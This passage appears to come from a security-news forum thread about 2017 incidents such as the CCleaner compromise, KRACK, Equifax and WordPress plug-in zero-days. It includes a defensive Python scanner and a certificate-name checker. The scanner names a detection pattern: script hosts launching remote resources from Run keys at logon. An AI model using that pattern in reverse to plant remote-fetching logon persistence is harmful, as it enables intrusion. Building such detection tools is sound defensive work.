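    """Classify one autorun entry; None means nothing noteworthy."""
    image = image_name(cmd)
    urls = URL_RE.findall(cmd)
    if image in SCRIPT_HOSTS and urls:
        # Script host + remote resource at logon: the pattern from the post.
        return Finding(name, "high", f"{image} started at logon with remote resource {urls[0]}")
    if urls:
        # Autorun entries normally point at local files only.
        return Finding(name, "medium", f"autorun references remote resource {urls[0]}")
    if image in SCRIPT_HOSTS:
        return Finding(name, "low", f"autorun launches script host {image} with local arguments")
    return None


def scan_run_values(values: Dict[str, str]) -> List[Finding]:
    """Run inspect_run_value over every entry and keep the hits."""
    findings: List[Finding] = []
    for name, cmd in values.items():
        finding = inspect_run_value(name, cmd)
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_run_values(SAMPLE_RUN_VALUES):
        print(f"[{f.severity}] {f.name}: {f.reason}")
```

On a live system the same function can be fed the output of `reg query` for the Run keys; a "high" hit is worth comparing against what the AV's memory scan reports, since the post's point is that only known code is caught there.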
-
<snip>
Thank you, Simion, for your reaction.
Thanks, pol. Stay safe!
-
That Instagram hack is shaping up to be way bigger than anyone thought
http://mashable.com/2017/09/01/instagram-hack-regular-users/?utm_cid=hp-h-1#jEdk3_CXkPqz
http://www.thedailybeast.com/hackers-make-searchable-database-to-dox-instagram-celebs
-
VirusTotal uploader has privacy leaks: http://seclists.org/fulldisclosure/2017/Sep/5
Weak privacy design by both Google and VT.
polonus
-
Presumably this doesn't apply when uploading files directly to the website.
-
Hi Ehmen,
You are right there. It is just the Windows uploader that has this. ;)
polonus
-
Cybersecurity Incident & Important Consumer Information
https://www.equifaxsecurity2017.com/
-
(http://screencast-o-matic.com/screenshots/u/Lh/1504872278860-94841.png)
https://blog.avast.com/equifax-website-hacked-now-what
-
L.S.
If in this new situation you wanna stay monopolist and protect data you should do a better job of it.
and you also should know where your private data went on the non-public Interwebs, read:
https://www.bloomberg.com/news/articles/2017-09-07/three-equifax-executives-sold-stock-before-revealing-cyber-hack
Data commerce through algorithms, a new "weapon of math destruction",
making the rich richer and the poor poorer still.
polonus
-
Lenovo Wasn't Paying Attention: 750,000 Laptops Had Spyware
https://www.inverse.com/article/36136-lenovo-settles-spyware-laptop-case-ftc-32-states
-
Lenovo Wasn't Paying Attention: 750,000 Laptops Had Spyware
https://www.inverse.com/article/36136-lenovo-settles-spyware-laptop-case-ftc-32-states
But they already have form for that going back a few years, at that point I was looking for a new laptop and Lenovo was certainly something I was looking at based on value for money. After the revelation, the Lenovo name went off my radar, trust once lost is very hard to regain.
-
I have a Lenovo but the model isn't on the list of affected computers.
Excellent computer at a very reasonable price. :)
-
Microsoft Office Zero-Day Vulnerability Addressed in September Patch Tuesday
http://blog.trendmicro.com/trendlabs-security-intelligence/microsoft-office-zero-day-vulnerability-addressed-september-patch-tuesday/
-
Thanks, Pondus, for the "heads-up" on this one. Hope everyone will be so wise to patch immediately.
Another thing, stay away from URL shorteners or use them wisely, as they were used in this LinkedIn phishing campaign:
https://blog.malwarebytes.com/threat-analysis/2017/09/compromised-linkedin-accounts-used-to-send-phishing-links-via-private-message-and-inmail/
URL shorteners are a well-known vehicle for spreading malware and phishing scams but they are also used for legitimate purposes, especially on social media where long URLs tend to be too cumbersome. In this attack, the perpetrators are abusing both -
ow.ly and a free hosting provider (-gdk.mx) to redirect to the phishing page, itself hosted on a hacked website.
polonus aka Damian
-
Thanks, Pondus, for the "heads-up" on this one. Hope everyone will be so wise to patch immediately.
Another thing, stay away from URL shorteners or use them wisely, as they were used in this LinkedIn phishing campaign:
https://blog.malwarebytes.com/threat-analysis/2017/09/compromised-linkedin-accounts-used-to-send-phishing-links-via-private-message-and-inmail/
URL shorteners are a well-known vehicle for spreading malware and phishing scams but they are also used for legitimate purposes, especially on social media where long URLs tend to be too cumbersome. In this attack, the perpetrators are abusing both -
ow.ly and a free hosting provider (-gdk.mx) to redirect to the phishing page, itself hosted on a hacked website.
polonus aka Damian
It also depends on Who is using that shortened link. and if you trust that site and or that person posting the link.
If you aren't sure, it isn't hard to use a tool that shows the actual URL which can always be checked for malicious content.
-
Backdoor in WordPress plug-in Display Widgets abused: https://www.pluginvulnerabilities.com/2017/09/11/wordpress-poor-handling-of-plugin-security-exacerbates-malicious-takeover-of-display-widgets/
polonus
-
Malvertising Campaign Mines Cryptocurrency Right in Your Browser
Malware authors are using JavaScript code delivered via malvertising campaigns to mine different cryptocurrencies inside people's browsers, without their knowledge.
https://www.bleepingcomputer.com/news/security/malvertising-campaign-mines-cryptocurrency-right-in-your-browser/
-
Adware Installs InfoStealer Trojan that it loads via Chrome DLL Hijacking
https://www.bleepingcomputer.com/news/security/adware-installs-infostealer-trojan-that-it-loads-via-chrome-dll-hijacking/
-
CCleaner Compromised to Distribute Malware for Almost a Month
https://www.bleepingcomputer.com/news/security/ccleaner-compromised-to-distribute-malware-for-almost-a-month/
https://forum.piriform.com/index.php?showtopic=48868
https://www.piriform.com/news/blog/2017/9/18/security-notification-for-ccleaner-v5336162-and-ccleaner-cloud-v1073191-for-32-bit-windows-users
-
CCleaner Compromised to Distribute Malware for Almost a Month
https://www.bleepingcomputer.com/news/security/ccleaner-compromised-to-distribute-malware-for-almost-a-month/
https://forum.piriform.com/index.php?showtopic=48868
https://www.piriform.com/news/blog/2017/9/18/security-notification-for-ccleaner-v5336162-and-ccleaner-cloud-v1073191-for-32-bit-windows-users
HOLY MOLY! CCleaner is a very popular tool, used by many, properly also in here. Distribution of a malicious version for over a month, is a very serious issue.
Since CCleaner is now owned by Avast, I expect Avast to follow this up with a tool that can detect, remove and report on this infection. A tool which can be run manually, but also deployed via network.
Get cracking Avast, you have some serious cleaning up to do.
-
Well this is where the blame actually should go, the creators of a fake Windows update,
infecting with trojan/win32-floxif-a.
Best removal if affected is restoring your system to a previous state before the infection took place.
Also remember for the free version of CCleaner, a manual update is needed.
So in the future always run your OS as user, not as admin, and have back-ups always.
polonus
-
Locky Ransomware Pushed Alongside FakeGlobe in Upgraded Spam Campaigns
http://blog.trendmicro.com/trendlabs-security-intelligence/locky-ransomware-pushed-alongside-fakeglobe-upgraded-spam-campaigns/
=======================================================
In the specific campaigns discussed below, both Locky and the ransomware FakeGlobe were being distributed—but the two were rotated. The cybercriminals behind the campaign designed it so that clicking on a link from the spam email might deliver Locky one hour, and then FakeGlobe the next. This makes re-infection a distinct possibility, as victims infected with one ransomware are still vulnerable to the next one in the rotation.
=======================================================
-
Another mobile anti-virus app did not protect but infect: https://blog.checkpoint.com/2017/09/18/does-your-mobile-anti-virus-app-protect-or-infect-you/
Who, what and where can you fully trust in the digital infrastructure any longer, when the going gets narrow.
polonus
-
Another mobile anti-virus app did not protect but infect: https://blog.checkpoint.com/2017/09/18/does-your-mobile-anti-virus-app-protect-or-infect-you/
Who, what and where can you fully trust in the digital infrastructure any longer, when the going gets narrow.
polonus
1st tip, don't use what you don't know. 2nd tip even if you know the company, do a bit of investigating before installing.
3rd tip always back up what you can't afford to lose. Nothing is ever 100% so you need a way back if what you depend on to keep
you safe, fails.
-
Closer to home, EFF warned because of the recent 'supply chain' CCleaner attack:
Read:
https://air.mozilla.org/why-and-how-of-reproducible-builds-distrusting-our-own-infrastructure-for-safer-software-releases/
also
https://www.ece.cmu.edu/~ganger/712.fall02/papers/p761-thompson.pdf
Why it becomes harder and harder to have trust in Trust!
polonus
-
Closer to home, EFF warned because of the recent 'supply chain' CCleaner attack:
Read:
https://air.mozilla.org/why-and-how-of-reproducible-builds-distrusting-our-own-infrastructure-for-safer-software-releases/
also
https://www.ece.cmu.edu/~ganger/712.fall02/papers/p761-thompson.pdf (https://www.ece.cmu.edu/~ganger/712.fall02/papers/p761-thompson.pdf)
Why it becomes harder and harder to have trust in Trust!
polonus
A simple analogy. A Restaurant with one excellent cook is pretty trustworthy.
When expansion happens and we now have 10 cooks, that trustworthiness now decreases because it's harder to trust 10 people.
It also becomes harder to track the responsible person when something goes wrong. It also becomes harder to quickly correct the problem.
-
Poor Internal Security Measures/Practices Take a Toll:
More data lost or stolen in first half of this year than in all of 2016
http://breachlevelindex.com/assets/Breach-Level-Index-Report-H1-2017-Gemalto.pdf
-> https://www.theregister.co.uk/2017/09/20/gemalto_breach_index/
Wise up, folks, now learn and educate, don't be sloppy or let yourselves be dumbed down
by legit and illegal data grabbers :o
pol
-
More concerns about the CCleaner Control and Command Server,
additional malware has been installed to a small number of victims,
approx. 20 servers with 8 organizations, that have infested around 2.2 million users.
Thanks to api-hacker group: "Chinese time zone PRC, APT17/Group 72".
Read: http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html
Some more background on this sophisticated hacker group:
https://blogs.cisco.com/security/talos/opening-zxshell & https://attack.mitre.org/wiki/Group/G0001
Information the info stealer gathers:
local hostname
organization
owner
operating system details
CPU speed
total physical memory
polonus
-
Serious gaping hole in Joomla CMS - update asap: https://blog.ripstech.com/2017/joomla-takeover-in-20-seconds-with-ldap-injection-cve-2017-14596/
pol
-
WordPress plug-in developers partnered with spammers and spammed you for 4 to 5 years:
https://www.wordfence.com/blog/2017/09/coordinated-plugin-spam/
It's all about the money... ;D
pol
-
Continuing update on the CCleaner investigation:
https://blog.avast.com/progress-on-ccleaner-investigation
-
In the light of the recent CCleaner data breach, with many victims in my country, the Netherlands, I pondered on this info,
that has been available for us all for quite some time. But what can the common end-user do, when no one protects us
against the spooks that instigate this on the infrastructure.... :o
Where government agents put us at risk, command-and-control-server with weaknesses and RATs:
Read:
http://searchsecurity.techtarget.com/feature/Command-and-control-servers-The-puppet-masters-that-govern-malware
&
https://campustechnology.com/articles/2017/05/02/industry-tool-detects-thousands-of-c2-server-rats.aspx
&
https://www.fireeye.com/blog/threat-research/2010/09/chasing-cnc-servers-part-2.html
&
https://tweakers.net/nieuws/123911/interpol-en-beveiligingsbedrijven-identificeren-8800-c2-servers-in-zuidoost-azie.html
(use Google translate to do a quick and dirty translation into English)
If there is no hardened server security, or low-end insecure C2 servers are being used, those entities (groups/firms) these actions are directed against are "food for the birds" soon. Helped by weak implementations, hiding data traffic via non-public clouds with all sorts of holes, like we had with Cloudbleed, etc. Unsigned versions :o -> https://www.theregister.co.uk/2017/09/21/slack_linux/
It is a mess, dear forum folks, and it is going from bad to worse. What they wanna cover?
polonus
-
This went wrong with the CCleaner compromise: wrong low-end server administration.
- One did not have any insight into (non-standard) network traffic;
- No following up/alert for the server being low on disk space;
- No following up/alert that logging was being removed / Did they have permission (RCE/EoP?);
- No log backup but an external system;
- No follow up/alert that the database was corrupted;
- No follow up/alert that a re-installation of the database had taken place.
Hopefully avast servers are better protected...
polonus
-
Heartbleed, Cloudbleed..... Is there more? Yes: Optionsbleed:
https://blog.fuzzing-project.org/60-Optionsbleed-HTTP-OPTIONS-method-can-leak-Apaches-server-memory.html
Not always configured as should be: https://simonecarletti.com/blog/2016/08/redirect-domain-http-https-www-apache/
polonus
-
Another one to join the leakers' band. Verizon: https://www.theregister.co.uk/2017/09/22/verizon_falls_for_the_old_unguarded_aws_s3_bucket_trick_exposes_internal_system/
Data breaches, data breaches and more data breaches: https://mackeepersecurity.com/post/verizon-wireless-employee-exposed-confidential-data-online
polonus
P.S. More clumsiness, Adobe loses a private key online: https://www.theregister.co.uk/2017/09/22/oh_dear_adobe_security_blog_leaks_private_key_info/
D
-
Hundreds of firms vulnerable to be hacked easily via support ticket:
https://medium.freecodecamp.org/how-i-hacked-hundreds-of-companies-through-their-helpdesk-b7680ddc2d4c
polonus
-
Malicious website crypto-mining:
https://www.cybereason.com/labs-cybereason-detects-adylkuzz-cryptocurrency-botnet-using-doublepulsar-exploit-in-japan/
Re: https://unix.stackexchange.com/questions/144412/why-am-i-getting-inconsistent-ip-values-from-icanhazip-com-or-curlmyip-com
and https://forums.malwarebytes.com/topic/167967-2325325467-hxxpicanhazipcom/
and https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Agent-ADRF/detailed-analysis.aspx
polonus
P.S. Also look here: http://www.badbitcoin.org/thebadlist/
-
Additional information regarding the recent CCleaner APT security incident
https://blog.avast.com/additional-information-regarding-the-recent-ccleaner-apt-security-incident
-
Interesting, Pondus, very interesting, all around LA's ServerCrate C2 server,
and the links to Romania; shortly, a peek into the sordid little world of state actor infostealers.
Not a place to dwell in...
polonus
-
Activist attacked by advanced targeted PHISHING: https://www.eff.org/deeplinks/2017/09/phish-future
Scary, are Big Brother agents fighting free expression that does not fit them well?
polonus
-
The Coming Software Apocalypse:
https://www.theatlantic.com/technology/archive/2017/09/saving-the-world-from-code/540393/
polonus
-
Apple computers are at risk from flawed updates, researchers find
https://www.cnet.com/news/apple-macbook-vulnerable-firmware-updates/
Apple may not be alone
Smith said Windows computers likely have similar (or worse) problems, but he doesn't yet have data to support that suspicion.
-
Internet wide security update on hold: https://lists.dns-oarc.net/pipermail/dns-operations/2017-September/016766.html
There are a number of reasons why systems may not be ready to accept the new KSK key:
An old configuration with the 2010 key written into the code itself.
A failure to implement the RFC 5011 protocol that will automatically update the key.
Flaws or conflicts in software that prevent the automatic rollover from happening, or accepting the change when it does happen.
No matter what the reason, it is an indication of how incredibly difficult it is to update the internet on a network-wide basis. Just look at IPv6.
pol
-
Three new zero-days being abused in WordPress plug-ins:
https://www.wordfence.com/blog/2017/10/3-zero-day-plugin-vulnerabilities-exploited-wild/
PHP-based CMS, a disaster in the hands of the unsavvy!
polonus
-
Every single Yahoo account was compromised by hackers
http://nordic.businessinsider.com/yahoo-3-billion-accounts-were-compromised-in-its-hacking-attack-2017-10?r=US&IR=T
https://www.bloomberg.com/news/articles/2017-10-03/yahoo-says-all-3-billion-users-probably-affected-by-2013-breach
http://www.marketwatch.com/story/every-yahoo-account-was-affected-by-2013-hack-verizon-now-says-2017-10-03
-
Win7 kernel security to be applied to Win10 kernel as well?
That is what Google wants: https://googleprojectzero.blogspot.nl/2017/10/using-binary-diffing-to-discover.html
polonus
P.S. See attached code txt attached, copyright 1989 by Dave Angel, providing a mem-dump for fuzzers. (pol)
-
Security Alert: User Info Breach
https://blog.disqus.com/security-alert-user-info-breach
-
Security Alert: User Info Breach
https://blog.disqus.com/security-alert-user-info-breach
Ouch. Would be nice if they informed their users. :(
-
Another vulnerable plug-in in WordPress: https://web.archive.org/web/20170817183628/https://wordpress.org/plugins/postman-smtp/
Patched by another developer: https://github.com/yehudah/Postman-SMTP
polonus
-
Forrester.com Experienced A Cybersecurity Incident
https://go.forrester.com/blogs/forrester-com-experienced-a-cybersecurity-incident/
-
Microsoft silently fixes security holes in Windows 10 – dumps Win 7, 8 out in the cold
http://www.theregister.co.uk/2017/10/06/researchers_say_windows_10_patches_punch_holes_in_older_versions/
-
Microsoft silently fixes security holes in Windows 10 – dumps Win 7, 8 out in the cold
http://www.theregister.co.uk/2017/10/06/researchers_say_windows_10_patches_punch_holes_in_older_versions/
The only thing is that I'm not surprised about what MS gets up to or in this case doesn't get up to.
-
Microsoft silently fixes security holes in Windows 10 – dumps Win 7, 8 out in the cold
http://www.theregister.co.uk/2017/10/06/researchers_say_windows_10_patches_punch_holes_in_older_versions/
The only thing is that I'm not surprised about what MS gets up to or in this case doesn't get up to.
Yepp you have to trust that your AV vendor has those exploits blocked
https://googleprojectzero.blogspot.no/2017/10/using-binary-diffing-to-discover.html
-
The SS7 (Signalling System 7) protocol is as holed as holed can be. Do no longer use SMS authentication!
Read: http://anonymous-news.com/how-hackers-can-use-two-factor-authentication-to-hack-your-gmail-empty-bitcoin-wallet/
polonus
P.S. Related threat: a USB cable with an inbuilt SIM card... https://secure.dshield.org/forums/diary/Whats+in+a+cable+The+dangers+of+unauthorized+cables/22904/
Damian
-
Google allows 37,000 Chrome users to be tricked with a fake extension by fraudulent developer who clones popular name and spams keywords.
https://twitter.com/SwiftOnSecurity/status/917446126382526464
-
Whatsapp and similar apps could be spied upon for data about your wake/sleeping patterns and other interesting data...
Re: https://robertheaton.com/2017/10/09/tracking-friends-and-strangers-using-whatsapp/
Re: https://news.ycombinator.com/item?id=15435822 (about other scenarios)....
A phone number could be enough of a lead....
Frightening, isn't it? A world without any privacy!
polonus
-
Russia to block access to "dubious" cryptocurrency exchange websites, as they call it:
https://www.theregister.co.uk/2017/10/10/russia_to_ban_cryptocurrency_exchanges/
Certainly there are bad bitcoin scam & fake miners sites: http://www.badbitcoin.org/thebadlist/
And these had better be blocked.
polonus
-
Alert https://www.ncsc.nl/actueel/factsheets/factsheet-tls-interceptie.html
Example where things are wrong: https://urlquery.net/report/be049d88-859c-4fa8-8cb9-8cc53e4de3fc
and http://toolbar.netcraft.com/site_report?url=http%3A%2F%2Fsd-1367041-l.dattaweb.com%2F
and -http://sd-1367041-l.dattaweb.com/
Warnings
TLS1.2
This server is vulnerable to a TLS renegotiation attack
Site cert has 2 errors
Wrong certificate installed.
The domain name does not match the certificate common name or SAN.
Intermediate certificate missing.
GeoTrust SSL CA - G3 -> https://observatory.mozilla.org/analyze.html?host=sd-1367041-l.dattaweb.com
Normal user should trust those that keep these servers up.
polonus (checking it for you ;D )
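The "domain name does not match the certificate common name or SAN" warning in the scan output above is produced by the same name-matching rule a browser applies. The following is an added example (not code from the post, from Netcraft or from Mozilla Observatory) that implements that rule in Python over constructed SAN lists and hostnames; the hostnames and certificate names are placeholders, not the server discussed in the post. It also shows why a certificate with a SAN list is never rescued by a matching CN, which is the usual reason a shared-hosting server triggers this warning.

```python
"""Hostname-vs-certificate matching as browsers do it (RFC 6125 style).

Added example with constructed inputs; not code from the forum post or from
any scanner named there. IP-address SANs and IDN encoding are out of scope.
"""
from typing import Iterable, List, Optional


def hostname_matches(host: str, names: Iterable[str]) -> bool:
    """True if host matches at least one dNSName entry in names.

    Rules enforced:
      - comparison is case-insensitive and ignores a trailing dot;
      - '*' may only be the entire left-most label ('*.example.net');
      - a wildcard never spans a dot ('*.example.net' does not match
        'a.b.example.net') and must be followed by at least two labels,
        so '*.com' is rejected.
    """
    host = host.rstrip(".").lower()
    host_labels = host.split(".")
    for raw in names:
        name = raw.rstrip(".").lower()
        if "*" not in name:
            if name == host:
                return True
            continue
        labels = name.split(".")
        # Wildcard must be the whole first label, nothing else may contain
        # '*', and at least two fixed labels must follow it.
        if labels[0] != "*" or any("*" in l for l in labels[1:]) or len(labels) < 3:
            continue
        if len(labels) == len(host_labels) and labels[1:] == host_labels[1:]:
            return True
    return False


def check_certificate_names(host: str, san_dns: List[str],
                            common_name: Optional[str]) -> dict:
    """Return a verdict for the scan-style 'wrong certificate installed' warning.

    Browsers ignore the CN entirely once a subjectAltName extension is
    present; the CN is only consulted as a legacy fallback when there is no
    SAN list at all.
    """
    if san_dns:
        matched = hostname_matches(host, san_dns)
        source = "SAN"
    else:
        matched = common_name is not None and hostname_matches(host, [common_name])
        source = "CN (legacy fallback, SAN absent)"
    return {
        "host": host,
        "matched": matched,
        "checked_against": source,
        "warning": None if matched else
        "The domain name does not match the certificate common name or SAN.",
    }


# Constructed sample: a shared-hosting box serving a certificate issued for a
# different customer's site. Placeholder names, not a real server.
SAMPLE_HOST = "customer-site.example"
SAMPLE_SAN = ["www.other-customer.example", "other-customer.example"]
SAMPLE_CN = "www.other-customer.example"

if __name__ == "__main__":
    print(check_certificate_names(SAMPLE_HOST, SAMPLE_SAN, SAMPLE_CN))
    print(check_certificate_names("api.example.net", ["*.example.net"], None))
```

The second call in the usage block passes because the wildcard occupies the whole left-most label; replacing the host with "a.b.example.net" fails, which is the behaviour a misconfigured multi-level virtual host runs into.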
-
"Responsible encryption" to facilitate the Surveillance State a bad idea:
EFF's response to the proposals...
https://www.eff.org/deeplinks/2017/10/deputy-attorney-general-rosensteins-responsible-encryption-demand-bad-and-he
What we need is good e2e encryption everywhere.
It is either full encryption or no encryption at all, and digi-n00b politicians won't understand. (Rosenstein, Budd etc.).
Make sure to introduce TLS 1.3 on websites everywhere:
Enhanced Security
Most of the attacks on TLS from the last few years targeted vestigial pieces of the protocol left around from the 90s. TLS 1.2 is highly configurable, and vulnerable sites simply failed to disable the older features in hopes of being compatible with old browsers.
TLS 1.3 embraces the “less is more” philosophy, removing support for older broken forms of cryptography. That means you can’t turn on the potentially vulnerable stuff, even if you try. The list of TLS 1.2 features that have been removed is extensive, and most of the exiled features have been associated with high profile attacks. These include:
RSA key transport — Doesn’t provide forward secrecy
CBC mode ciphers — Responsible for BEAST, and Lucky 13
RC4 stream cipher — Not secure for use in HTTPS
SHA-1 hash function — Deprecated in favor of SHA-2
Arbitrary Diffie-Hellman groups — CVE-2016-0701
Export ciphers — Responsible for FREAK and LogJam
Quote from Introducing TLS 1.3 by CloudFlare CDN.
Google Chrome and Firefox support TLS 1.3 per default.
Let us make the world more secure instead of less secure,
polonus (volunteer website security analyst and website error-hunter)
-
Microsoft Corp. faces a coordinated investigation by European privacy regulators after it failed to do enough to address their concerns about the collection and processing of user data with a series of changes to Windows 10 last month.
https://www.bloomberg.com/news/articles/2017-02-21/microsoft-faces-european-privacy-probes-over-windows-10
Data-protection agencies from the Netherlands, Germany, France, the U.K., Spain, Hungary and Slovenia are collaborating on the Microsoft probes according to Dutch Watchdog.
polonus
-
Third party malscript injection: https://arstechnica.com/information-technology/2017/10/equifax-rival-transunion-also-sends-site-visitors-to-malicious-pages/
The Internet is an insecure place often....
polonus
-
Microsoft’s October Patch Tuesday Fixes 62 Vulnerabilities, including an Office Zero-Day
http://blog.trendmicro.com/trendlabs-security-intelligence/microsofts-october-patch-tuesday-office-zero-day/
-
Key Reinstallation Attacks - Breaking WPA2 by forcing nonce reuse
https://www.krackattacks.com/
-
Thanks Pondus,
Especially endangering to the 32% of Android users out on Android 6.0.
Will they all get the update?
The 4-way handshake vulnerability has been around for a shocking 14 years...
link: https://developer.android.com/about/dashboards/index.html
See attached info...
polonus
-
NoScript Firefox bug - icon disappeared: https://forums.informaction.com/viewtopic.php?f=7&t=23388&p=90410&hilit=icon#p90410
polonus
-
I noticed the No Script icon went walk about, rather than do as was suggested in that URL, I just went into the Customise option of Firefox and found it in a different location. I just dragged it back down to where I normally have it (bottom right of the window).
-
Vulnerable to the WPA2 attack is, see: https://www.kb.cert.org/vuls/byvendor?searchview&Query=FIELD+Reference=228519&SearchOrder=4
polonus
-
Vulnerable to the WPA2 attack is, see: https://www.kb.cert.org/vuls/byvendor?searchview&Query=FIELD+Reference=228519&SearchOrder=4
polonus
In the case of modems and routers received from an ISP, "Date Updated" means on existing devices in people's homes and offices, or devices people will be getting from now on?
-
Key Reinstallation Attacks - Breaking WPA2 by forcing nonce reuse
https://www.krackattacks.com/
Microsoft shuts down Krack with sneaky Windows update
https://www.computerworld.com/article/3233198/microsoft-windows/microsoft-shuts-down-krack-with-sneaky-windows-update.html
-
A New IoT Botnet Storm is Coming
https://research.checkpoint.com/new-iot-botnet-storm-coming/
-
Another zero-day in an extension used to attack WordPress websites, detected by Wordfence.
https://wordpress.org/plugins/ultimate-form-builder-lite/#developers
pol
-
New authentication method on Lenovo - FIDO:
They claim to be the first: http://www.businesswire.com/news/home/20171024005571/en/Lenovo%E2%84%A2-Intel%C2%AE-Deliver-Simpler-Safer-Online-Authentication
Is it safe and cannot it be circumvented?
polonus
-
New authentication method on Lenovo - FIDO:
They claim to be the first: http://www.businesswire.com/news/home/20171024005571/en/Lenovo%E2%84%A2-Intel%C2%AE-Deliver-Simpler-Safer-Online-Authentication
Is it safe and cannot it be circumvented?
polonus
Personally since the various security issues relating to Lenovo, I would be wary of any security related promotion connected to Lenovo.
Previous to my purchase of this Win10 Acer notebook, Lenovo products were attractive given the performance vs. price. Security issues, however, took Lenovo right off my list and they haven't regained my trust (very hard in my case).
Also fingerprints as a security measure are losing ground as far as security goes; they can be tricked by a lifted fingerprint. Something that has also been talked about is that fingerprints actually change as we get older; have a look at your fingerprints: the young's are relatively clear and well defined, while older computer users will see (excuse the pun) that their fingerprints aren't so clearly defined. They look more worn and faded, possibly more so in those who were in a manual job.
-
New authentication method on Lenovo - FIDO:
They claim to be the first: http://www.businesswire.com/news/home/20171024005571/en/Lenovo%E2%84%A2-Intel%C2%AE-Deliver-Simpler-Safer-Online-Authentication
Is it safe and cannot it be circumvented?
polonus
Personally since the various security issues relating to Lenovo, I would be wary of any security related promotion connected to Lenovo.
Previous to my purchase of this Win10 Acer notebook, Lenovo products were attractive given the performance vs. price. Security issues, however, took Lenovo right off my list and they haven't regained my trust (very hard in my case).
Also fingerprints as a security measure are losing ground as far as security goes; they can be tricked by a lifted fingerprint. Something that has also been talked about is that fingerprints actually change as we get older; have a look at your fingerprints: the young's are relatively clear and well defined, while older computer users will see (excuse the pun) that their fingerprints aren't so clearly defined. They look more worn and faded, possibly more so in those who were in a manual job.
As long as we're just talking about fingerprints, I'll agree with you. :) :) :)
-
New authentication method on Lenovo - FIDO:
They claim to be the first: http://www.businesswire.com/news/home/20171024005571/en/Lenovo%E2%84%A2-Intel%C2%AE-Deliver-Simpler-Safer-Online-Authentication
Is it safe and cannot it be circumvented?
polonus
<snip>
Also fingerprints as a security measure are losing ground as far as security goes; they can be tricked by a lifted fingerprint. Something that has also been talked about is that fingerprints actually change as we get older; have a look at your fingerprints: the young's are relatively clear and well defined, while older computer users will see (excuse the pun) that their fingerprints aren't so clearly defined. They look more worn and faded, possibly more so in those who were in a manual job.
As long as we're just talking about fingerprints, I'll agree with you. :) :) :)
Yes that is the 'main' train of my thoughts fingerprints really aren't that great as far as security is concerned. There have been articles about biometrics.
"The measurement of physical characteristics, such as fingerprints, DNA, or retinal patterns, for use in verifying the identity of individuals" from http://www.tfd.com/biometrics .
Retinal use for id purposes has also had some negative reports/issues if used for authentication. Whilst the use of DNA is probably the most secure it has a long way to go before it can be used for id/authentication at such a low level. I don't think that we will see 'lick/touch screens/pads' to analyse your saliva any time soon.
-
Bad Rabbit: Not-Petya is back with improved ransomware
https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/
-
Tyrant Ransomware Spreads in Iran Disguised as Popular VPN App
https://www.bleepingcomputer.com/news/security/tyrant-ransomware-spreads-in-iran-disguised-as-popular-vpn-app/
-
Dwindling privacy and less security resulting in ever so many data-breaches, now again in the land of down under:
https://medium.com/@woj_ciech/short-story-about-s3-bucket-python-script-thousands-of-data-and-australian-government-435e4d2b213e
polonus
-
A typical case of lack of input validation for e-mail fraud; damage for customers could be over a million dollars...
http://theartnewspaper.com/news/galleries-lose-large-sums-to-cybercrime
2FA, in a lot of cases, it cannot come in too soon,
polonus
-
Tor browser IP leaks for Linux and Mac users:
Tor project came with an important update: https://blog.torproject.org/tor-browser-709-released
This bug was detected as a design flaw: https://trac.torproject.org/projects/tor/ticket/24052
For some the leakage was hard to reproduce.
Probably the design error was found, because of the transition to unix domain sockets.
Read about this by Robert Ransom at this link: https://packetstormsecurity.com/files/112439/torproxy-bypass.txt
How to reproduce an example was given here: https://trac.torproject.org/projects/tor/ticket/5741
Download and verify "tor-browser-gnu-linux-i686-2.2.35-10-dev-en-US.tar.gz"
Start up Wireshark to monitor your network, optionally filtering for "dns"
Unpack Tor and start it by running the "start-tor-browser" script
Once TorBrowser is open, go to "?http://bitcoincharts.com/"
See DNS request for "bitcoincharts.com" being logged in Wireshark
System information:
Tor Browser Bundle for 32-bit Linux, version 2.2.35-10
Running on Fedora 16
To reproduce the exact syntax used and configuration are important,
obfuscation already can be an erroneous factor,
those into reproducing could come up with their own "scrum-report" of sorts.
(info credits security dot nl).
polonus
P.S. The right order and right use of vpn and tor on whonix could be critical for security reasons.
Important notice:
Remember to use these anonymity tools only for legitimate use. Abuse of such services is a legal offence,
and abusers will often suffer the consequences, when found out. No hacker is really out of harm's way. :D
In some countries the use of such tools may be forbidden (certain VPN services in the Russian Federation,
when keys are withheld from the authorities).
Damian
-
Asian government sites hacked to be abused by PHISHing: https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/
pol
-
PHISHING back as one of the major Internet threats, why so few phishing websites are actually detected and blocked by AV?
See the report: https://security.googleblog.com/2017/11/new-research-understanding-root-cause.html
Best phishing detection performance from IDS alerting "Fortinet's"; see urlquery.net results.
Also check on: http://www.urlvoid.com/scan/freckleface.com.au/
Bitdefender TrafficLight extension and Webutation Rating also do a fine job.
The average AV solution often miserably fails to detect, or
detects long after the fact, when the actual phishing campaign is long over.
Third party content blocking via NoScript and uMatrix and browser hygiene is your best option.
Just an example where average AV fails: http://www.urlvoid.com/scan/freckleface.com.au/ -> https://urlquery.net/report/7e257590-c233-482d-871b-db7baadbb167
where only OpenPhish and fortinet detect and alert this.
Also has to do with what we consider accepted legal phishing by a big techno corporation, like Google's for instance,
and what is considered as 'bad phishing', two standards going and a lot of confusion for the modern end-user ::)
polonus (volunteer website security analyst and website error-hunter)
-
This needs to be done ASAP - Disable SMB1 (https://davescomputertips.com/why-you-need-to-disable-smb1-now/?utm_source=wysija&utm_medium=email&utm_campaign=Weekly+Recap+Newsletter)
Server Message Block (SMB) is a local network file sharing protocol designed for sharing data, printers, etc.
between computers. SMBv1 is the formative iteration of the protocol which has since been replaced by SMBv2 and SMBv3.
SMB1 is still enabled by default in Windows simply to cater for specific older software which hasn’t been updated to support SMB2 or SMB3.
Microsoft will be disabling SMB1 by default starting with the Windows 10 Fall Creators Update.
It was still turned on on my systems and they are all running Windows 10 Fall Creators Update
-
@bob3160
Very interesting, but I do find the response by many companies "Vendor does not publicly document their requirement for SMB1." That is pretty poor and almost an admission that they do use it, this certainly doesn't help the user protect their system.
I would be seriously looking to get rid of any program that doesn't comment on their use of SMBv1, if they do, then their users systems could be at risk. If they don't use it (or use a later version of SMBv?) then their users aren't at risk, but should still disable SMBv1.
-
@bob3160
